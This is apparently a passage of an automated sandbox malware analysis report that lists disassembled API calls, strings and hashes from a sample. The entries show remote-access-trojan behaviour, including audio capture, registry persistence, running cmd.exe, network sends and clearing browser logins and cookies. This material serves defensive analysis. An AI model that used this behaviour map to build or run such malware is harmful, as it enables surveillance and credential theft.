                                                  • waveInAddBuffer.WINMM(`%Z,00000020,?,00000000,020F1B7A), ref: 020F19C4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wave$BufferHeaderPrepare
                                                  • String ID: T=G$`%Z
                                                  • API String ID: 2315374483-470489524
                                                  • Opcode ID: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                                                  • Instruction ID: 861a074bf01736987d1ca7e2e2781c32e554cb86b343ce0fe89868bda4240ce5
                                                  • Opcode Fuzzy Hash: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                                                  • Instruction Fuzzy Hash: FD01A271341314AFD7509F28EC44EA5BBBAFB49315B014539F909C3B61EB31AC54AB98
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
                                                    • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 004347DC
                                                    • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 00434800
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                  • String ID: bad locale name
                                                  • API String ID: 3628047217-1405518554
                                                  • Opcode ID: 07a2f8cd9595a8075203c453c032e2fb497ed10d9d6fcf4fa69d5ee2e3489bdb
                                                  • Instruction ID: 69d9b4558c1556c2c918d31b5ea24064f6fee533cc814fb99c42b36f0b05f267
                                                  • Opcode Fuzzy Hash: 07a2f8cd9595a8075203c453c032e2fb497ed10d9d6fcf4fa69d5ee2e3489bdb
                                                  • Instruction Fuzzy Hash: 1AF08171400204EAC724FB23D853ACA73A49F54748F90497FB506214D2EF38A618CA8C
                                                  APIs
                                                  • GetModuleHandleExW.KERNEL32(00000000,0045BCE0,00000000,?,?,?,021327F1,00000000,?,02132791,00000000,0046DAE0,0000000C,021328E8,00000000,00000002), ref: 02132860
                                                  • GetProcAddress.KERNEL32(00000000,0045BCF8), ref: 02132873
                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,021327F1,00000000,?,02132791,00000000,0046DAE0,0000000C,021328E8,00000000,00000002), ref: 02132896
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: #v
                                                  • API String ID: 4061214504-554117064
                                                  • Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                  • Instruction ID: 5e0e35a0e2a76e0d5ff80f3186e68391565ff84105212ad4a9832e17b877477a
                                                  • Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                  • Instruction Fuzzy Hash: CEF0A430A44209FBCB16AFA0EC09B9EBFB5EB04716F0000F9FC05A2151CF749940CA98
                                                  APIs
                                                  • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 004126E1
                                                  • RegSetValueExA.ADVAPI32(004655B0,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041BC46,WallpaperStyle,004655B0,00000001,00473EE8,00000000), ref: 00412709
                                                  • RegCloseKey.ADVAPI32(004655B0,?,?,0041BC46,WallpaperStyle,004655B0,00000001,00473EE8,00000000,?,004079DD,00000001), ref: 00412714
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateValue
                                                  • String ID: Control Panel\Desktop
                                                  • API String ID: 1818849710-27424756
                                                  • Opcode ID: 3aedce82be745f7a8d31741b6ddf3b86529f340df0cdc46c1cf573c60441b443
                                                  • Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
                                                  • Opcode Fuzzy Hash: 3aedce82be745f7a8d31741b6ddf3b86529f340df0cdc46c1cf573c60441b443
                                                  • Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94
                                                  APIs
                                                  • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 02102948
                                                  • RegSetValueExA.ADVAPI32(004655B0,0046BE08,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0210BEAD,0046BE08,004655B0,00000001,00473EE8,00000000), ref: 02102970
                                                  • RegCloseKey.ADVAPI32(004655B0,?,?,0210BEAD,0046BE08,004655B0,00000001,00473EE8,00000000,?,020F7C44,00000001), ref: 0210297B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateValue
                                                  • String ID: Control Panel\Desktop
                                                  • API String ID: 1818849710-27424756
                                                  • Opcode ID: 3aedce82be745f7a8d31741b6ddf3b86529f340df0cdc46c1cf573c60441b443
                                                  • Instruction ID: 0cb14d5614d3bcdf50d7c63fdbfc3bdfb788b542ac94c10bed2cb6daca900b4f
                                                  • Opcode Fuzzy Hash: 3aedce82be745f7a8d31741b6ddf3b86529f340df0cdc46c1cf573c60441b443
                                                  • Instruction Fuzzy Hash: EEF09032580214FFDB019FA0EC55EEE376DEF00B50F144124BE06A61A1EB71DE04EA50
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: H_prolog
                                                  • String ID: T=G$T=G$wkE
                                                  • API String ID: 3519838083-2195589345
                                                  • Opcode ID: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                  • Instruction ID: 1e26a5473d8f755ae4b769ca73fd8e4989785d27d133237046c5e782ffdae985
                                                  • Opcode Fuzzy Hash: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                  • Instruction Fuzzy Hash: B0F05071B403107FC794FB24880069D7775DB41314F10C12A9E1477650CB394D00EB61
                                                  APIs
                                                  • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                  • RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                  • RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateValue
                                                  • String ID: TUF
                                                  • API String ID: 1818849710-3431404234
                                                  • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                  • Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
                                                  • Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                  • Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4
                                                  APIs
                                                  • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 02102A4A
                                                  • RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,020FBBB3,004660E0,00000001,000000AF,00465554), ref: 02102A65
                                                  • RegCloseKey.ADVAPI32(?,?,?,?,020FBBB3,004660E0,00000001,000000AF,00465554), ref: 02102A70
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateValue
                                                  • String ID: TUF
                                                  • API String ID: 1818849710-3431404234
                                                  • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                  • Instruction ID: 7286310e01be96e5283bd0e084c4da79290820e3581ae9a69b149428d13eb9e9
                                                  • Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                  • Instruction Fuzzy Hash: B4E03071540204FFEF219BA19C09FDA3BA8EB04B95F004060FA05E6191D771CE04D794
                                                  APIs
                                                  • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExecuteShell
                                                  • String ID: /C $cmd.exe$open
                                                  • API String ID: 587946157-3896048727
                                                  • Opcode ID: b29912c7ec69b7e063321f84cff0ad8ed8559f61d9423d2534ea1fccbc267807
                                                  • Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
                                                  • Opcode Fuzzy Hash: b29912c7ec69b7e063321f84cff0ad8ed8559f61d9423d2534ea1fccbc267807
                                                  • Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004014E6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: GetLastInputInfo$User32.dll
                                                  • API String ID: 2574300362-1519888992
                                                  • Opcode ID: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                  • Instruction ID: 425bdc246283df71b7ad83aa0519e38d385401eab2b134f4ae8d574857069069
                                                  • Opcode Fuzzy Hash: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                  • Instruction Fuzzy Hash: D7B092B85843849BC7202BE0BC0DA297BA4FA48B43720447AF406D11A1EB7881809F6F
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __alldvrm$_strrchr
                                                  • String ID:
                                                  • API String ID: 1036877536-0
                                                  • Opcode ID: fd79a7ba97117714d85021eba27869df20238d29c0b4b296cd839071043617be
                                                  • Instruction ID: 63a095292c52d92af2bf19a392fdfa9b0d117a80b68c781492b1ecdde0b53e6f
                                                  • Opcode Fuzzy Hash: fd79a7ba97117714d85021eba27869df20238d29c0b4b296cd839071043617be
                                                  • Instruction Fuzzy Hash: 60A168729042469FFB21CF58C8817AEBBE2EF55314F24416FE5849B382DA3C8D45C759
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __alldvrm$_strrchr
                                                  • String ID:
                                                  • API String ID: 1036877536-0
                                                  • Opcode ID: 34a4a8fdb2fbaed24085f9f51e48c21e05a0faa9b4c0d03c29d10533be22c836
                                                  • Instruction ID: 0f1ef37db0b0f428361c9b5d63b84fb7813fb3c8cc2f27486c9fb18780074c2e
                                                  • Opcode Fuzzy Hash: 34a4a8fdb2fbaed24085f9f51e48c21e05a0faa9b4c0d03c29d10533be22c836
                                                  • Instruction Fuzzy Hash: E1A18B72A807869FEB27CF28C8907BEBBE7EF55310F1841ADD4959B281C7B48941CB50
                                                  APIs
                                                  • RegOpenKeyExA.ADVAPI32(80000002,0046BD30,00000000,00020019,?), ref: 0210BAAD
                                                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0210BAF1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: EnumOpen
                                                  • String ID:
                                                  • API String ID: 3231578192-0
                                                  • Opcode ID: c129c5d3b2225b1f8cda05c9a3a6c18510288d4317852ec5d704d9b0c7986d58
                                                  • Instruction ID: 24671abec11ea7b47993db04d479456eee55d73cacf8d456a2ca557c774bc214
                                                  • Opcode Fuzzy Hash: c129c5d3b2225b1f8cda05c9a3a6c18510288d4317852ec5d704d9b0c7986d58
                                                  • Instruction Fuzzy Hash: B58133321483449FD3A4EB20D850FEFB3E9EF94304F50492EE98686594EF30AA49DF56
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: 396dac2f3812ff065a3283cc201ba07d86737f2a766ab43e7d660d85bd51e2e6
                                                  • Instruction ID: 60b7a5d7657021f3c6775de64a8da8d79c7dfc60cad5c6da4267d84d9a3e87ea
                                                  • Opcode Fuzzy Hash: 396dac2f3812ff065a3283cc201ba07d86737f2a766ab43e7d660d85bd51e2e6
                                                  • Instruction Fuzzy Hash: 68417F316C02047FDB366B788C88AAE3AABEF15774F940215F42CD6290DF718A019BA1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9b4993e58d5b3b7c0490c3bd99df1984d1f8f515a64746adb67fb48e1b339b7f
                                                  • Instruction ID: 90b3d0a8f148eb65ba096d855dd205fb67a40d318d5acb0a54968c3478788488
                                                  • Opcode Fuzzy Hash: 9b4993e58d5b3b7c0490c3bd99df1984d1f8f515a64746adb67fb48e1b339b7f
                                                  • Instruction Fuzzy Hash: 10412B71A00744AFF724AF78CC41B6ABBE8EF88714F10452FF511DB291E679A9458788
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9b4993e58d5b3b7c0490c3bd99df1984d1f8f515a64746adb67fb48e1b339b7f
                                                  • Instruction ID: 17be2fcaf2b45655af8d7656bd66d9e876c6239553c874b4b9447907ecdbb9ac
                                                  • Opcode Fuzzy Hash: 9b4993e58d5b3b7c0490c3bd99df1984d1f8f515a64746adb67fb48e1b339b7f
                                                  • Instruction Fuzzy Hash: CA410E72680744FFD7269F78CC44BAA7BFBEF49714F10856AE159DB280D77295018B80
                                                  APIs
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                                                  • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
                                                  • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                  • String ID:
                                                  • API String ID: 3360349984-0
                                                  • Opcode ID: c10093164e1d5fb7eaa38f431242b8870439df387f8de07d06c271e3420c01d9
                                                  • Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
                                                  • Opcode Fuzzy Hash: c10093164e1d5fb7eaa38f431242b8870439df387f8de07d06c271e3420c01d9
                                                  • Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A
                                                  APIs
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 020F49DF
                                                  • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 020F49F3
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 020F49FE
                                                  • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 020F4A07
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                  • String ID:
                                                  • API String ID: 3360349984-0
                                                  • Opcode ID: e7efdc3c20157fe016eb29e5a130d6f8c33beeccd37b3f6c9988191ed4582187
                                                  • Instruction ID: 62f78849b5106fbcf75fb352c6a25dbd86082564811b21dff88762afded744e9
                                                  • Opcode Fuzzy Hash: e7efdc3c20157fe016eb29e5a130d6f8c33beeccd37b3f6c9988191ed4582187
                                                  • Instruction Fuzzy Hash: 7441B271288341AFC795EB20DC54DBFB7EEAF90310F04092DBE9282A90DF20D909EA55
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000006,?,00000000,00000000,?,?,?,?,00000001,?,00000006,00000001,?,?), ref: 02140187
                                                  • MultiByteToWideChar.KERNEL32(?,00000001,00000006,?,00000000,?,?,?,?,00000001,?,00000006,00000001,?,?,?), ref: 02140210
                                                  • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,?,00000006,00000001,?,?,?,00000002,?), ref: 02140222
                                                  • __freea.LIBCMT ref: 0214022B
                                                    • Part of subcall function 02136D66: RtlAllocateHeap.NTDLL(00000000,0212468A,?), ref: 02136D98
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                  • String ID:
                                                  • API String ID: 2652629310-0
                                                  • Opcode ID: d6883ffe4d8719f2de826ec879274d1cc3acae2ccbd5fd9a5eba82e14a7f8a2b
                                                  • Instruction ID: f06988d33ebfc3e0a577b2b3e3b8f16907d052b9fc332a66c323bd2a3cb1c5f0
                                                  • Opcode Fuzzy Hash: d6883ffe4d8719f2de826ec879274d1cc3acae2ccbd5fd9a5eba82e14a7f8a2b
                                                  • Instruction Fuzzy Hash: 6831E172A4021AAFDF298F65DC40EBE7BA6EF48714F040168FD08D7190EB35C954CBA0
                                                  APIs
                                                  Strings
                                                  • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
                                                  • Cleared browsers logins and cookies., xrefs: 0040B8EF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                  • API String ID: 3472027048-1236744412
                                                  • Opcode ID: 1ebdc9d393bd906508629a47cee4a4f9660b191437ef965b7b6c2574ee936d2b
                                                  • Instruction ID: 8ec9c8031b8ac0664cfb8a22ca307bf710261ddd843e88104a77dac6ce00e7b7
                                                  • Opcode Fuzzy Hash: 1ebdc9d393bd906508629a47cee4a4f9660b191437ef965b7b6c2574ee936d2b
                                                  • Instruction Fuzzy Hash: FA31891564C3816ACA11777514167EB6F958A93754F0884BFF8C4273E3DB7A480893EF
                                                  APIs
                                                    • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
                                                    • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
                                                    • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
                                                  • Sleep.KERNEL32(00000BB8), ref: 004115C3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpenQuerySleepValue
                                                  • String ID: @CG$exepath$BG
                                                  • API String ID: 4119054056-3221201242
                                                  • Opcode ID: bf5574a8b4d2f3dae16cf885c7a16fb18bb29924f8325a853eaea5d7e5cb2135
                                                  • Instruction ID: 48aadeccb903c06d46a934e3c92f1fe58b0119fffb77d403c20537554d94cb98
                                                  • Opcode Fuzzy Hash: bf5574a8b4d2f3dae16cf885c7a16fb18bb29924f8325a853eaea5d7e5cb2135
                                                  • Instruction Fuzzy Hash: C721F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DE7D9D4581AD
                                                  APIs
                                                    • Part of subcall function 021028C4: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 021028E0
                                                    • Part of subcall function 021028C4: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 021028F9
                                                    • Part of subcall function 021028C4: RegCloseKey.ADVAPI32(?), ref: 02102904
                                                  • Sleep.KERNEL32(00000BB8), ref: 0210182A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpenQuerySleepValue
                                                  • String ID: @CG$exepath$BG
                                                  • API String ID: 4119054056-3221201242
                                                  • Opcode ID: 820c01e33afeab3fc0483e6c9ee435281bf1bbf0289cdfb463ea79f6631d800d
                                                  • Instruction ID: 4c64d6029b15c4c4cc15869cc741650c6e8a143ae341f9f50ebb0bdd477f6cc8
                                                  • Opcode Fuzzy Hash: 820c01e33afeab3fc0483e6c9ee435281bf1bbf0289cdfb463ea79f6631d800d
                                                  • Instruction Fuzzy Hash: 6B214892BC03042BC66476381C44AFF328FCBC1744F00453AFE1A976C7EF69C90996A9
                                                  APIs
                                                  • SetEvent.KERNEL32(?,?), ref: 020F50D8
                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 020F5188
                                                  • TranslateMessage.USER32(?), ref: 020F5197
                                                  • DispatchMessageA.USER32(?), ref: 020F51A2
                                                  • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 020F525A
                                                  • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 020F5292
                                                    • Part of subcall function 020F46CF: send.WS2_32(?,00000000,00000000,00000000), ref: 020F4764
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                  • String ID:
                                                  • API String ID: 2956720200-0
                                                  • Opcode ID: 822d3e8355dfe554be3e3a6cb7f23e7c77d447b8df2c12cbc1a70b6fed0e93d0
                                                  • Instruction ID: aa827aecfb0671048936071130a85b5c43e8a8a74b3188518f21854f4cca740c
                                                  • Opcode Fuzzy Hash: 822d3e8355dfe554be3e3a6cb7f23e7c77d447b8df2c12cbc1a70b6fed0e93d0
